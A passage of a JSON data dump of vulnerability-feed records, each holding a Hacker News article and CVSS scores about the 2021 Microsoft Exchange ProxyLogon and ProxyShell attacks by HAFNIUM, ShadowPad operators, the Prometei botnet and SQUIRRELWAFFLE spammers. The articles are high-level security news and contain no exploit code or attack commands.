accidentally or purposefully leaked it to other groups.\n\nIt is also being claimed that some tools used in the \"second wave\" of attacks towards the end of February are similar to proof-of-concept attack code that Microsoft shared with antivirus companies and other security partners on February 23, raising the possibility that threat actors may have gotten their hands on private disclosure that Microsoft shared with its security partners.\n\nThe other theory is that the threat actors independently discovered the same set of vulnerabilities, which were then exploited to stealthily conduct reconnaissance of target networks and steal mailboxes, before ramping up the attacks once the hackers figured out Microsoft was readying a patch.\n\n\"This is the [second time](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) in the last four months that nation-state actors have engaged in cyberattacks with the potential to affect businesses and organizations of all sizes,\" Microsoft [said](<https://www.microsoft.com/security/blog/2021/03/12/protecting-on-premises-exchange-servers-against-recent-attacks/>). \"While this began as a nation-state attack, the vulnerabilities are being exploited by other criminal organizations, including new ransomware attacks, with the potential for other malicious activities.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-16T06:06:00", "type": "thn", "title": "Use This One-Click Mitigation Tool from Microsoft to Prevent Exchange Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-16T10:01:21", "id": "THN:814DFC4A310E0C39823F3110B0457F8C", "href": "https://thehackernews.com/2021/03/use-this-one-click-mitigation-tool-from.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-29T03:57:39", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi1PBy6f30rb04dAbZTbbnNt_W5SsZO3lhS31ENdnsfmrEYox9AZqd9kkYEBWsIV7uSrZP9dAtk2CeSdHT11tl2O5v7j6aazExHwKgOa9cUjnDFSksGKSSYBaP63LbQXnlo9FAJRw0Bswxnf-qcDJqylBF-wVoy4-FvQFO7TgmdBsXrkgBd8kpl5jet/s728-e100/ics.jpg>)\n\nEntities located in Afghanistan, Malaysia, and Pakistan are in the crosshairs of an 
attack campaign that targets unpatched Microsoft Exchange Servers as an initial access vector to deploy the ShadowPad malware.\n\nRussian cybersecurity firm Kaspersky, which first detected the activity in mid-October 2021, [attributed](<https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/>) it to a previously unknown Chinese-speaking threat actor. Targets include organizations in the telecommunications, manufacturing, and transport sectors.\n\n\"During the initial attacks, the group exploited an MS Exchange vulnerability to deploy ShadowPad malware and infiltrated [building automation systems](<https://en.wikipedia.org/wiki/Building_automation>) of one of the victims,\" the company said. \"By taking control over those systems, the attacker can reach other, even more sensitive systems of the attacked organization.\"\n\n[ShadowPad](<https://thehackernews.com/2022/06/state-backed-hackers-using-ransomware.html>), which emerged in 2015 as the successor to PlugX, is a privately sold modular malware platform that has been put to use by many Chinese espionage actors over the years. \n\nWhile its design allows users to remotely deploy additional plugins that can extend its functionality beyond covert data collection, what makes ShadowPad dangerous is the anti-forensic and anti-analysis techniques incorporated into the malware.\n\n\"During the attacks of the observed actor, the ShadowPad backdoor was downloaded onto the attacked computers under the guise of legitimate software,\" Kaspersky said. 
\"In many cases, the attacking group exploited a known vulnerability in MS Exchange, and entered the commands manually, indicating the highly targeted nature of their campaigns.\"\n\nEvidence suggests that intrusions mounted by the adversary began in March 2021, right around the time the [ProxyLogon vulnerabilities](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) in Exchange Servers became public knowledge. Some of the targets are said to have been breached by exploiting [CVE-2021-26855](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>), a server-side request forgery (SSRF) vulnerability in the mail server.\n\nBesides deploying ShadowPad as \"mscoree.dll,\" an authentic Microsoft .NET Framework component, the attacks also involved the use of Cobalt Strike, a PlugX variant called [THOR](<https://thehackernews.com/2021/07/chinese-hackers-implant-plugx-variant.html>), and web shells for remote access.\n\nAlthough the final goals of the campaign remain unknown, the attackers are believed to be interested in long-term intelligence gathering.\n\n\"Building automation systems are rare targets for advanced threat actors,\" Kaspersky ICS CERT researcher Kirill Kruglov said. \"However, those systems can be a valuable source of highly confidential information and may provide the attackers with a backdoor to other, more secured, areas of infrastructures.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-28T11:30:00", "type": "thn", "title": "APT Hackers Targeting Industrial Control Systems with ShadowPad Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-06-29T03:13:37", "id": "THN:97FD375C23B4E7C3F13B9F3907873671", "href": "https://thehackernews.com/2022/06/apt-hackers-targeting-industrial.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-LnAVswTXLc0/YECXmVTkFHI/AAAAAAAAB8M/VcsyTjTU0j85SwVjVTnc-hf3yFwUgogTgCLcBGAsYHQ/s0/cisa.jpg>)\n\nFollowing Microsoft's release of out-of-band patches to address multiple zero-day flaws in on-premises versions of Microsoft Exchange Server, the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) has [issued](<https://cyber.dhs.gov/ed/21-02/>) an emergency directive warning of \"[active exploitation](<https://us-cert.cisa.gov/ncas/alerts/aa21-062a>)\" of the vulnerabilities.\n\nThe alert comes on the heels of Microsoft's [disclosure](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) that China-based hackers were exploiting unknown software bugs in Exchange server to steal sensitive data from select targets, marking the [second time in four months](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>) that the U.S. has scrambled to address a widespread hacking campaign believed to be the work of foreign threat actors.\n\nWhile the company mainly attributed the campaign to a threat group called HAFNIUM, Slovakian cybersecurity firm ESET [said](<https://twitter.com/ESETresearch/status/1366862946488451088>) it found evidence of CVE-2021-26855 being actively exploited in the wild by several cyber espionage groups, including LuckyMouse, Tick, and Calypso targeting servers located in the U.S., Europe, Asia, and the Middle East.\n\n[](<https://thehackernews.com/images/-TmA9t5dn7V8/YECZLOHV3DI/AAAAAAAAB8U/oGFCJ8b-FuE0teg_Vh5Chc3yvuQ70JNdQCLcBGAsYHQ/s0/hacking.jpg>)\n\nResearchers at Huntress Labs have also sounded the alarm about mass exploitation of Exchange servers, noting that over 350 web shells have been discovered across approximately 2,000 vulnerable servers.\n\n\"Among the vulnerable servers, we also found over 350 web shells \u2014 some targets may have more than one web shell, potentially indicating automated deployment or multiple uncoordinated actors,\" Huntress senior security researcher John Hammond [said](<https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers>). 
\"These endpoints do have antivirus or EDR solutions installed, but this has seemingly slipped past a majority of preventative security products.\"\n\nThe latest development indicates a much larger spread that extends beyond the \"limited and targeted\" attacks reported by Microsoft earlier this week.\n\nIt's not clear if any U.S. government agencies have been breached in the campaign, but the CISA directive underscores the urgency of the threat. \n\nStrongly urging organizations to apply the patches as soon as possible, the agency cited the \"likelihood of widespread exploitation of the vulnerabilities after public disclosure and the risk that federal government services to the American public could be degraded.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-04T08:26:00", "type": "thn", "title": "CISA Issues Emergency Directive on In-the-Wild Microsoft Exchange Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-05T06:35:30", "id": "THN:A73831555CB04403ED3302C1DDC239B1", "href": "https://thehackernews.com/2021/03/cisa-issues-emergency-directive-on-in.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:03", "description": "[](<https://thehackernews.com/images/-zhQ48QulMdk/YEoxFcQGtGI/AAAAAAAACA4/814m_r5DKVkVs6zM_Hl9_2EeOlHMeXvTgCLcBGAsYHQ/s0/proxylogon-poc-exploit.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) on Wednesday issued a joint advisory warning of active exploitation of vulnerabilities in Microsoft Exchange on-premises products by nation-state actors and cybercriminals.\n\n\"CISA and FBI assess that adversaries could exploit these vulnerabilities to compromise networks, steal information, encrypt data for ransom, or even execute a destructive attack,\" the agencies [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/10/fbi-cisa-joint-advisory-compromise-microsoft-exchange-server>). 
\"Adversaries may also sell access to compromised networks on the dark web.\"\n\nThe attacks have primarily targeted local governments, academic institutions, non-governmental organizations, and business entities in various industry sectors, including agriculture, biotechnology, aerospace, defense, legal services, power utilities, and pharmaceutical, which the agencies say are in line with previous activity conducted by Chinese cyber actors.\n\nTens of thousands of entities, including the [European Banking Authority](<https://thehackernews.com/2021/03/microsoft-exchange-hackers-also.html>) and the [Norwegian Parliament](<https://www.reuters.com/article/us-norway-cyber/norway-parliament-sustains-fresh-cyber-attack-idUSKBN2B21TX>), are believed to have been breached to install a web-based backdoor called the [China Chopper web shell](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>) that grants the attackers the ability to plunder email inboxes and remotely access the target systems.\n\nThe development comes in light of the [rapid expansion](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) of attacks aimed at vulnerable Exchange Servers, with multiple threat actors exploiting the vulnerabilities as early as February 27 before they were eventually patched by Microsoft last week, swiftly turning what was labeled as \"limited and targeted\" into an indiscriminate mass exploitation campaign.\n\nWhile there is no concrete explanation for the widespread exploitation by so many different groups, speculations are that the adversaries shared or sold exploit code, resulting in other groups being able to abuse these vulnerabilities, or that the groups obtained the exploit from a common seller.\n\n### From RCE to Web Shells to Implants\n\nOn March 2, 2021, [Volexity](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) publicly 
disclosed the detection of [multiple zero-day exploits](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) used to target flaws in on-premises versions of Microsoft Exchange Servers, while pegging the earliest in-the-wild exploitation activity on January 3, 2021.\n\n[](<https://thehackernews.com/images/-5BlLSFX3zpg/YEosmvOx0eI/AAAAAAAACAo/nZ_vd-Gp5t0YKLVuZ3PO1-zu6tpT_hqRQCLcBGAsYHQ/s0/poc.jpg>)\n\nSuccessful weaponization of these flaws, called ProxyLogon, allows an attacker to access victims' Exchange Servers, enabling them to gain persistent system access and control of an enterprise network.\n\nAlthough Microsoft initially pinned the intrusions on Hafnium, a threat group that's assessed to be state-sponsored and operating out of China, Slovakian cybersecurity firm ESET on Wednesday [said](<https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/>) it identified no fewer than 10 different threat actors that likely took advantage of the remote code execution flaws to install malicious implants on victims' email servers.\n\nApart from Hafnium, the five groups detected as exploiting the vulnerabilities prior to the patch release are Tick, LuckyMouse, Calypso, Websiic, and Winnti (aka APT41 or Barium), with five others (Tonto Team, ShadowPad, \"Opera\" Cobalt Strike, Mikroceen, and DLTMiner) scanning and compromising Exchange servers in the days immediately following the release of the fixes.\n\nNo conclusive evidence has emerged so far connecting the campaign to China, but DomainTools' Senior Security Researcher Joe Slowik [noted](<https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders>) that several of the aforementioned groups have been formerly linked to China-sponsored activity, including Tick, LuckyMouse, Calypso, Tonto Team, Mikroceen, and the Winnti Group, indicating that Chinese entities other than Hafnium are tied to the Exchange exploitation 
activity.\n\n\"It seems clear that there are numerous clusters of groups leveraging these vulnerabilities, the groups are using mass scanning or services that allow them to independently target the same systems, and finally there are multiple variations of the code being dropped, which may be indicative of iterations to the attack,\" Palo Alto Networks' Unit 42 threat intelligence team [said](<https://unit42.paloaltonetworks.com/china-chopper-webshell/>).\n\nIn one cluster tracked as \"[Sapphire Pigeon](<https://redcanary.com/blog/microsoft-exchange-attacks/#clusters>)\" by researchers from U.S.-based Red Canary, attackers dropped multiple web shells on some victims at different times, some of which were deployed days before they conducted follow-on activity.\n\nAccording to ESET's telemetry analysis, more than 5,000 email servers belonging to businesses and governments from over 115 countries are said to have been affected by malicious activity related to the incident. For its part, the Dutch Institute for Vulnerability Disclosure (DIVD) [reported](<https://csirt.divd.nl/2021/03/08/Exchange-vulnerabilities-update/>) Tuesday that it found 46,000 servers out of 260,000 globally that were unpatched against the heavily exploited ProxyLogon vulnerabilities.\n\n[](<https://thehackernews.com/images/-f2zgTwFBKWw/YEos7G5zJ-I/AAAAAAAACAw/m0hGtK4suCkDQoGBl9drBf63JXBQA7YfQCLcBGAsYHQ/s0/cyberattack-timeline.jpg>)\n\nTroublingly, evidence points to the fact that the deployment of the web shells ramped up following the availability of the patch on March 2, raising the possibility that additional entities have opportunistically jumped in to create exploits by reverse engineering Microsoft updates as part of multiple, independent campaigns.\n\n\"The day after the release of the patches, we started to observe many more threat actors scanning and compromising Exchange servers en masse,\" said ESET researcher Matthieu Faou. 
\"Interestingly, all of them are APT groups focused on espionage, except one outlier that seems related to a known coin-mining campaign (DLTminer). It is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later.\"\n\nAside from installing the web shell, other behaviors related to or inspired by Hafnium activity include [conducting reconnaissance](<https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3>) in victim environments by deploying batch scripts that automate several functions such as account enumeration, credential-harvesting, and network discovery.\n\n### Public Proof-of-Concept Available\n\nComplicating the situation further is the availability of what appears to be the first functional public proof-of-concept (PoC) exploit for the ProxyLogon flaws despite Microsoft's attempts to take down exploits published on GitHub over the past few days.\n\n[](<https://thehackernews.com/images/-jZ4Km1P3Jic/YEoruswQHKI/AAAAAAAACAg/3mKbCQaUVkA1x98uEBtKA4hueS2e9ZqRgCLcBGAsYHQ/s0/proxylogon-exploit.jpg>)\n\n\"I've confirmed there is a public PoC floating around for the full RCE exploit chain,\" security researcher Marcus Hutchins [said](<https://twitter.com/MalwareTechBlog/status/1369729825104007169>). 
\"It has a couple bugs but with some fixes I was able to get shell on my test box.\"\n\nAlso accompanying the PoC's release is a detailed [technical write-up](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>) by Praetorian researchers, who reverse-engineered CVE-2021-26855 to build a fully functioning end-to-end exploit by identifying differences between the vulnerable and patched versions.\n\nWhile the researchers deliberately decided to omit critical PoC components, the development has also raised concerns that the technical information could further accelerate the development of a working exploit, in turn triggering even more threat actors to launch their own attacks.\n\nAs the sprawling hack's timeline slowly crystallizes, what's clear is that the surge of breaches against Exchange Server appears to have happened in two phases, with Hafnium using the chain of vulnerabilities to stealthily attack targets in a limited fashion, before other hackers began driving the frenzied scanning activity starting February 27.\n\nCybersecurity journalist Brian Krebs [attributed](<https://krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/>) this to the prospect that \"different cybercriminal groups somehow learned of Microsoft's plans to ship fixes for the Exchange flaws a week earlier than they'd hoped.\"\n\n\"The best advice to mitigate the vulnerabilities disclosed by Microsoft is to apply the relevant patches,\" Slowik [said](<https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders>). \"However, given the speed in which adversaries weaponized these vulnerabilities and the extensive period of time pre-disclosure when these were actively exploited, many organizations will likely need to shift into response and remediation activities to counter existing intrusions.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-11T15:04:00", "type": "thn", "title": "ProxyLogon PoC Exploit Released; Likely to Fuel More Disruptive Cyber Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-15T08:52:31", "id": "THN:ABF9BC598B143E7226083FE7D2952CAE", "href": "https://thehackernews.com/2021/03/proxylogon-exchange-poc-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/---oICK3YQu8/YIJ50RG8cxI/AAAAAAAACWY/KkCLoHke1SsfzdcENBXnq3d4jAZlau0ggCLcBGAsYHQ/s0/malware.jpg>)\n\nAttackers are exploiting the ProxyLogon Microsoft Exchange Server flaws to co-opt vulnerable machines to a cryptocurrency botnet named Prometei, according to new research.\n\n\"Prometei exploits the recently disclosed Microsoft 
Exchange vulnerabilities associated with the HAFNIUM attacks to penetrate the network for malware deployment, credential harvesting and more,\" Boston-based cybersecurity firm Cybereason [said](<https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities>) in an analysis summarizing its findings.\n\nFirst documented by Cisco Talos in July 2020, [Prometei](<https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html>) is a multi-modular botnet, with the actor behind the operation employing a wide range of specially-crafted tools and known exploits such as EternalBlue and BlueKeep to harvest credentials, laterally propagate across the network and \"increase the amount of systems participating in its Monero-mining pool.\"\n\n\"Prometei has both Windows-based and Linux-Unix based versions, and it adjusts its payload based on the detected operating system, on the targeted infected machines when spreading across the network,\" Cybereason senior threat researcher Lior Rochberger said, adding it's \"built to interact with four different command-and-control (C2) servers which strengthens the botnet's infrastructure and maintains continuous communications, making it more resistant to takedowns.\"\n\nThe intrusions take advantage of the recently patched vulnerabilities in [Microsoft Exchange Servers](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) with the goal of abusing the processing power of the Windows systems to mine Monero.\n\nIn the attack sequence observed by the firm, the adversary was found exploiting Exchange server flaws CVE-2021-27065 and CVE-2021-26858 as an initial compromise vector to install the China Chopper web shell and gain backdoor ingress to the network. With this access in place, the threat actor launched PowerShell to download the initial Prometei payload from a remote server. 
\n\n[](<https://thehackernews.com/images/-QPt-u63tvwA/YIJ6AaW7GPI/AAAAAAAACWg/z8_YGp_eggY-c6gUKoOyrf5D3cZtnDdzwCLcBGAsYHQ/s0/malware.jpg>)\n\nRecent versions of the bot module come with backdoor capabilities that support an extensive set of commands, including an additional module called \"Microsoft Exchange Defender\" that masquerades as a legitimate Microsoft product, which likely takes care of removing other competing web shells that may be installed on the machine so that Prometei gets access to the resources necessary to mine cryptocurrency efficiently.\n\nInterestingly, newly unearthed evidence gathered from [VirusTotal](<https://www.virustotal.com/gui/file/cf542ada135ee3edcbbe7b31003192c75295c7eff0efe7593a0a0b0f792d5256/details>) [artifacts](<https://www.virustotal.com/gui/file/fdcf4887a2ace73b87d1d906b23862c0510f4719a6c159d1cde48075a987a52f/details>) has revealed that the botnet may have been around as early as May 2016, implying that the malware has constantly been evolving ever since, adding new modules and techniques to its capabilities.\n\nPrometei has been observed in a multitude of victims spanning across finance, insurance, retail, manufacturing, utilities, travel, and construction sectors, compromising networks of entities located in the U.S., U.K., and several countries in Europe, South America, and East Asia, while also explicitly avoiding infecting targets in former [Soviet bloc](<https://en.wikipedia.org/wiki/Eastern_Bloc>) countries.\n\nNot much is known about the attackers other than the fact that they are Russian speaking, with older versions of Prometei having their language code set as \"Russian.\" A separate Tor client module used to communicate with a Tor C2 server included a configuration file that's configured to avoid using several exit nodes located in Russia, Ukraine, Belarus, and Kazakhstan.\n\n\"Threat actors in the cybercrime community continue to adopt APT-like techniques and improve efficiency of their operations,\" Rochberger 
said. \"As observed in the recent Prometei attacks, the threat actors rode the wave of the recently discovered Microsoft Exchange vulnerabilities and exploited them in order to penetrate targeted networks.\"\n\n\"This threat poses a great risk for organizations, since the attackers have absolute control over the infected machines, and if they wish so, they can steal information, infect the endpoints with other malware or even collaborate with ransomware gangs by selling the access to the infected endpoints,\" she added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-23T07:42:00", "type": "thn", "title": "Prometei Botnet Exploiting Unpatched Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-23T15:00:17", "id": 
"THN:F2A3695D04A2484E069AC407E754A9C1", "href": "https://thehackernews.com/2021/04/prometei-botnet-exploiting-unpatched.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjiGzDP_Q8TgakrIFP6H8c0NlSHHH4ztdEtesv8G-AaS-LvfiauO6JgcrFpPKfplpRuqYssvepWzyhQaLMIPqPzyt00vE0kNEL3qEg1k1YRQpWZouKa_km8jD-kuKbNBXugV_MhYndYW41kM6o2z77T4oOGQlDGhGk-HA0tZfdol-RO_fCE6o7N54uW>)\n\nThreat actors are exploiting ProxyLogon and ProxyShell exploits in unpatched Microsoft Exchange Servers as part of an ongoing spam campaign that leverages stolen email chains to bypass security software and deploy malware on vulnerable systems.\n\nThe findings come from Trend Micro following an investigation into a number of intrusions in the Middle East that culminated in the distribution of a never-before-seen loader dubbed SQUIRRELWAFFLE. First publicly [documented](<https://thehackernews.com/2021/10/hackers-using-squirrelwaffle-loader-to.html>) by Cisco Talos, the attacks are believed to have commenced in mid-September 2021 via laced Microsoft Office documents.\n\n\"It is known for sending its malicious emails as replies to pre-existing email chains, a tactic that lowers a victim's guard against malicious activities,\" researchers Mohamed Fahmy, Sherif Magdy, Abdelrhman Sharshar [said](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) in a report published last week. 
\"To be able to pull this off, we believe it involved the use of a chain of both ProxyLogon and ProxyShell exploits.\"\n\n[ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) and [ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>) refer to a collection of flaws in Microsoft Exchange Servers that could enable a threat actor to elevate privileges and remotely execute arbitrary code, effectively granting the ability to take control of the vulnerable machines. While the ProxyLogon flaws were addressed in March, the ProxyShell bugs were patched in a series of updates released in May and July.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEhYwBTFRq5MuslNIXJAtZNZ-q9Ik0Wyu_z6HVG8loZsBaeJR_tXRLvm18OZvIJYeeOyYp0DVHZdMg8sdqe9H3ePEot8dMGuNuC25YWuyp09kuYsm_qh2nU_3dlFK7X2kVXn-DYmtklqChAj_2BOpas4TFiWcbPR3PtoX5RKukcpGn0sd1S8Ubdqo1bu>) \n--- \nDLL infection flow \n \nTrend Micro said it observed the use of public exploits for CVE-2021-26855 (ProxyLogon), CVE-2021-34473, and CVE-2021-34523 (ProxyShell) on three of the Exchange servers that were compromised in different intrusions, using the access to hijack legitimate email threads and send malicious spam messages as replies, thereby increasing the likelihood that unsuspecting recipients will open the emails.\n\n\"Delivering the malicious spam using this technique to reach all the internal domain users will decrease the possibility of detecting or stopping the attack, as the mail getaways will not be able to filter or quarantine any of these internal emails,\" the researchers said, adding the attackers behind the operation did not carry out lateral movement or install additional malware so as to stay under the radar and avoid triggering any alerts.\n\nThe attack chain involves rogue email messages containing a link that, when clicked, drops a Microsoft Excel or Word file. 
Opening the document, in turn, prompts the recipient to enable macros, ultimately leading to the download and execution of the SQUIRRELWAFFLE malware loader, which acts as a medium to fetch final-stage payloads such as Cobalt Strike and Qbot.\n\nThe development marks a new escalation in phishing campaigns where a threat actor has breached corporate Microsoft Exchange email servers to gain unauthorized access to their internal mail systems and distribute malicious emails in an attempt to infect users with malware.\n\n\"SQUIRRELWAFFLE campaigns should make users wary of the different tactics used to mask malicious emails and files,\" the researchers concluded. \"Emails that come from trusted contacts may not be enough of an indicator that whatever link or file included in the email is safe.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 